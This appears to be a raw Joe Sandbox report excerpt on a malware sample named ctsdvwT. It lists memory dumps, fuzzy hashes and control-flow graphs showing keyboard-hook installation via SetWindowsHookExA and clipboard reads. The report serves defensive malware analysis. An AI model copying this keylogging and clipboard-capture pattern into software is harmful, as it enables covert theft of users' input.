                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98b4a349aac06a57dac451c940fbe2894729e197337b522ec02d8c3d83523995
                                        • Instruction ID: 242a48c92d101fa0d6d182f72e74cc402d6c25c2dd6e49a73488aa0c7f3733c2
                                        • Opcode Fuzzy Hash: 98b4a349aac06a57dac451c940fbe2894729e197337b522ec02d8c3d83523995
                                        • Instruction Fuzzy Hash: 48C04C7E111042DBF6562B54DC06F01BEA5FF91718F08C1A59091A7161C961C035AB15
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd

                                        Execution Graph

                                        Execution Coverage:9.8%
                                        Dynamic/Decrypted Code Coverage:93%
                                        Signature Coverage:1.5%
                                        Total number of Nodes:201
                                        Total number of Limit Nodes:25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,btq
                                        • API String ID: 0-3970051468

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1432 613ee20-613fe72 1435 613fe74-613fe7c 1432->1435 1436 613fe7e-613feb0 SetWindowsHookExA 1432->1436 1435->1436 1437 613feb2-613feb8 1436->1437 1438 613feb9-613fed9 1436->1438 1437->1438
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,00000000), ref: 0613FEA3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1357 613c2ac-613d5c4 1361 613d674-613d694 call 6136c44 1357->1361 1362 613d5ca-613d5cf 1357->1362 1369 613d697-613d6a4 1361->1369 1364 613d622-613d65a CallWindowProcW 1362->1364 1365 613d5d1-613d608 1362->1365 1367 613d663-613d672 1364->1367 1368 613d65c-613d662 1364->1368 1372 613d611-613d620 1365->1372 1373 613d60a-613d610 1365->1373 1367->1369 1368->1367 1372->1369 1373->1372
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0613D649
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1375 613e2cc-613e328 1376 613e332-613e370 OleGetClipboard 1375->1376 1377 613e372-613e378 1376->1377 1378 613e379-613e3c7 1376->1378 1377->1378 1383 613e3d7 1378->1383 1384 613e3c9-613e3cd 1378->1384 1386 613e3d8 1383->1386 1384->1383 1385 613e3cf 1384->1385 1385->1383 1386->1386
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1387 613dcc8-613e370 OleGetClipboard 1390 613e372-613e378 1387->1390 1391 613e379-613e3c7 1387->1391 1390->1391 1396 613e3d7 1391->1396 1397 613e3c9-613e3cd 1391->1397 1399 613e3d8 1396->1399 1397->1396 1398 613e3cf 1397->1398 1398->1396 1399->1399
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1400 613c2e8-613c307 1402 613c309-613c30b 1400->1402 1403 613c30e-613c3a4 1400->1403 1404 613d8c8-613d901 1402->1404 1403->1404 1407 613d909-613d934 KiUserCallbackDispatcher 1404->1407 1408 613d936-613d93c 1407->1408 1409 613d93d-613d951 1407->1409 1408->1409
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0613D89D), ref: 0613D927
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1411 613fe21-613fe24 1412 613fe26-613fe72 1411->1412 1413 613fe7a-613fe7d 1411->1413 1415 613fe7e-613feb0 SetWindowsHookExA 1412->1415 1418 613fe74-613fe7c 1412->1418 1413->1415 1416 613feb2-613feb8 1415->1416 1417 613feb9-613fed9 1415->1417 1416->1417 1418->1415
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0613FC90,00000000,00000000), ref: 0613FEA3
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1422 613c6f0-613c78c DuplicateHandle 1423 613c795-613c7b2 1422->1423 1424 613c78e-613c794 1422->1424 1424->1423
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0613C77F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1427 613c6f8-613c78c DuplicateHandle 1428 613c795-613c7b2 1427->1428 1429 613c78e-613c794 1427->1429 1429->1428
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0613C77F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06137956
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0613D89D), ref: 0613D927
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0613E1E5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4462312110.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_6130000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • API String ID:
                                        • Opcode ID: 514b90ba9649dd78a5003a0b071c8c0f2957a33053ac55fc43c0ac75b2514357
                                        • Instruction ID: f133a20fa10575b74218712b9671a82c5c1f05029712c5a031a88915e5155ded
                                        • Opcode Fuzzy Hash: 514b90ba9649dd78a5003a0b071c8c0f2957a33053ac55fc43c0ac75b2514357
                                        • Instruction Fuzzy Hash: A1215071B501068FEB08EB69C954BAE77F6BF88714F108065E505EB3A4DB71DD04CB50
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66b7eafdff5288da0d90cdbdf441d93857190987304155c3b744bdeb0255822b
                                        • Instruction ID: c80fd9695e548c7a3dfa5c7649c2f870501dba9a47f2df5d76fe34642d0a87ec
                                        • Opcode Fuzzy Hash: 66b7eafdff5288da0d90cdbdf441d93857190987304155c3b744bdeb0255822b
                                        • Instruction Fuzzy Hash: E3210E30B012058FDB64EB78C6657AD77F6AF89245F500868C40AEB754DF359D06CBA1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6aae57e02cddce974643ba3ae6786941ed5ae06642e3b0a43b4dced226d789d2
                                        • Instruction ID: 0e8f6b5d31c68acb6803079f2fe81e75d5f5acd61c999efa8ddf1792fa80ef4b
                                        • Opcode Fuzzy Hash: 6aae57e02cddce974643ba3ae6786941ed5ae06642e3b0a43b4dced226d789d2
                                        • Instruction Fuzzy Hash: 78215070E012099FDB18DFA4D49069EB7B2AF89310F60852AE815FB354EF74A845CB91
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f2494bdf74144ed74ed84801de03ffc965a21c8769782eb078a80ee57349d66
                                        • Instruction ID: 94394be63005095dd7757f388693ac55c50a6be8dbb9e0e9867e12f348bdea19
                                        • Opcode Fuzzy Hash: 9f2494bdf74144ed74ed84801de03ffc965a21c8769782eb078a80ee57349d66
                                        • Instruction Fuzzy Hash: FD214F386111018FDB26BB28F994B593799EB4530CF108A35E00EC7A5AEF38D8578B92
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c7c4489325b1fa5d5e3a2d09b802bb33f6c93d669a74579a54e0bac0e2f2fcb
                                        • Instruction ID: b6105ed9e7c0aea862ee45aeb9f4be7bb789a0e2803ba097efa0b9d13be28f1a
                                        • Opcode Fuzzy Hash: 0c7c4489325b1fa5d5e3a2d09b802bb33f6c93d669a74579a54e0bac0e2f2fcb
                                        • Instruction Fuzzy Hash: A2213E30B01245CFDB24EB74C5556AD77F1AF49348F500469D00AEB754DF358D46CBA1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b565fc9bea5557bf565c79baea384f3f6fd89bfc15f2161c876b63857ced3491
                                        • Instruction ID: 5cfc9f9a4692ca08ec0858dbd820c5c7025772c96b0e20257ff37b487d4330ab
                                        • Opcode Fuzzy Hash: b565fc9bea5557bf565c79baea384f3f6fd89bfc15f2161c876b63857ced3491
                                        • Instruction Fuzzy Hash: A821E630B40205CFDB14EB78DA59AAD77F2AB49715F610868E806EB760DF329D11CB91
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfd97c97186cf535b56fe24a86e842aa305aff2258ae3b6520b19f68716d4b0e
                                        • Instruction ID: 5b2502eea7ef2d452a77c43eef8b55830b4bdafc5ab06d43848aa4933bd93984
                                        • Opcode Fuzzy Hash: dfd97c97186cf535b56fe24a86e842aa305aff2258ae3b6520b19f68716d4b0e
                                        • Instruction Fuzzy Hash: F611E330A023045BEF667BB4D99036E7AA5EB45258F14497AD046CB242EF69C8CD8FD1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 825322fe57aadde3a9da97b6e78f666d852d1b0261ea0d94ce6cd9cff928b5c1
                                        • Instruction ID: 11d24bafc82237272cfd79d5fd9342814a9a5633b045c3568b17d42f6953f926
                                        • Opcode Fuzzy Hash: 825322fe57aadde3a9da97b6e78f666d852d1b0261ea0d94ce6cd9cff928b5c1
                                        • Instruction Fuzzy Hash: 9211CE30B002049BEF64BB79D59472E36A5EB45218F104979E006CF291EF64C8C98FC1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e5538ff69f2c9157d77fe3f59de66398736ac744defb3790f78815f04b3ec820
                                        • Instruction ID: 3ca0fde3c7e37cb2b6ece483907b5be320257de6e0af037d9635e20084c4335e
                                        • Opcode Fuzzy Hash: e5538ff69f2c9157d77fe3f59de66398736ac744defb3790f78815f04b3ec820
                                        • Instruction Fuzzy Hash: 9111CE72F012469FCB10AB78984965E7BB5EF88668F104829E90ED3740FF38C9028BD1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ced404face19651371de98df9831ff0bf543ef4b8195e13fd96b9553a8339f7
                                        • Instruction ID: 673652eeeb8b09753ac162d683d9b24824d4b9718338ea3d7b017b3702fa4c85
                                        • Opcode Fuzzy Hash: 9ced404face19651371de98df9831ff0bf543ef4b8195e13fd96b9553a8339f7
                                        • Instruction Fuzzy Hash: 84115271A013158FCB65FFB885902AD7BF5EF49210B15447AD40AE7241EB35C843CBA1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457021335.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_110d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 3b39ea9c246ddbc4ee15f010d3262607f3157fab3e131cb4c0bf3b390d9db1bd
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: 4511D075904280CFDB16CF54E5C4B15FF61FB44314F24C6A9D84D4B69AC37AD40ACB62
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fffa833da7733c975ce2009d7ed39118d343c36772c5c9b3b67237e6a59a91e
                                        • Instruction ID: 03b5a9e43c8585692095a011de63f65b370f7df3539e05e18b070585faf6104b
                                        • Opcode Fuzzy Hash: 6fffa833da7733c975ce2009d7ed39118d343c36772c5c9b3b67237e6a59a91e
                                        • Instruction Fuzzy Hash: 04012D71A002158FCB65FFB885902AD7BF6EF49210B15447AD80AE7241EB35D943CBA1
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46b41672893d4073dc0187de39d3987f3354c9898a1c97e6cbabd07f13a94146
                                        • Instruction ID: af0eed9c4d16e96485925d62907b7b0317e56e826a085ac2ec59d75c94b2009e
                                        • Opcode Fuzzy Hash: 46b41672893d4073dc0187de39d3987f3354c9898a1c97e6cbabd07f13a94146
                                        • Instruction Fuzzy Hash: C4F02B73A04150CBC726EBB494D01AC7BF1EE5421171840D7C40BDB252DB25D803CB51
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdb95a8ac9b9ab3a1280145f0cd3d5d68268de2e4d9425424ebb462f771324ab
                                        • Instruction ID: fb9979808db7040e86c917f24b4241931eacbb8e6386d44cc3e0ee77dab16be1
                                        • Opcode Fuzzy Hash: fdb95a8ac9b9ab3a1280145f0cd3d5d68268de2e4d9425424ebb462f771324ab
                                        • Instruction Fuzzy Hash: B4F06D309001099FCB06EFB4FA95A8D7BB9EF40308F504278C108AB659EB316A19CB92
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93f7e021b1d997d9ef654876b14696eacec1e2b4e85a5cb032415831b074f078
                                        • Instruction ID: 49d83ace982ec50fbb09835e0342d3d198083bf836be6995c5d19dbf36f71e4a
                                        • Opcode Fuzzy Hash: 93f7e021b1d997d9ef654876b14696eacec1e2b4e85a5cb032415831b074f078
                                        • Instruction Fuzzy Hash: 0BF01D349011099FCB06EFB4FA5599D7BB9EF40208F504679C1089B659EB316A19CB92
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.4457443945.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_2a80000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                        • Instruction ID: 5dca99c4d5b51d994a324a4744abe95da7db9e3e16b919e494546cffd4277d29
                                        • Opcode Fuzzy Hash: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                        • Instruction Fuzzy Hash: 6BC002363580508F9606A768E1644B977B6DBCA66932405EAE159CB762CE26A8029F40